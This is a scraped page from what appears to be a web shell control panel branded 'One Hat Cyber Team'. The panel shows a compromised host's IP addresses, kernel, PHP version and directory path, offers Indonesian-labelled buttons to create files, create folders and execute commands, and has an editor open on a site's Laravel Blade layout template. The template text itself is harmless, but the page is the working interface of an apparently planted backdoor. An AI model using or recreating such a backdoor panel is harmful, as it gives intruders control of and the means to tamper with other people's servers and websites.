⚝
One Hat Cyber Team
⚝
Your IP:
66.248.200.6
Server IP:
192.124.249.6
Server:
Linux 56.244.72.148.host.secureserver.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
umkm
/
public_html
/
resources
/
views
/
front
/
Edit File: layout.blade.php
@yield('og-meta')
{{ $bs->website_title }} @yield('pagename')
{{--
@if ($rtl == 1)
@endif --}} {{--
--}}
{{-- Toastr css --}}
@if ($rtl == 1)
@endif {{--
--}} @yield('styles') @if ($bs->is_whatsapp == 0 && $bs->is_tawkto == 0) @endif @php $primaryRgbColor = hex2rgb($bs->base_color); @endphp @if(!is_null($bs->adsense_publisher_id)) @endif @if ($bs->preloader_status == 1)
@endif @if (!request()->routeIs('user.login')) @includeIf('front.partials.header') @endif @if (!request()->routeIs('front.index') && !request()->routeIs('user.login'))
@yield('breadcrumb-title')
{{ __('Home') }}
@yield('breadcrumb-link')
@endif @yield('content') {{-- footer section --}} @if (!request()->routeIs('user.login')) @includeIf('front.partials.footer') @endif
@if ($be->cookie_alert_status == 1)
@include('cookie-consent::index')
@endif {{-- Popups start --}} @includeIf('front.partials.popups') {{-- Popups end --}} {{-- WhatsApp Chat Button --}}
{{-- --}} {{-- --}} @yield('scripts') @yield('vuescripts') @if (session()->has('success')) @endif @if (session()->has('error')) @endif @if (session()->has('warning')) @endif {{-- whatsapp init code --}} @if ($bs->is_whatsapp == 1) @endif @if ($bs->is_tawkto == 1) @php $directLink = str_replace('tawk.to', 'embed.tawk.to', $bs->tawkto_property_id); $directLink = str_replace('chat/', '', $directLink); @endphp @endif
Simpan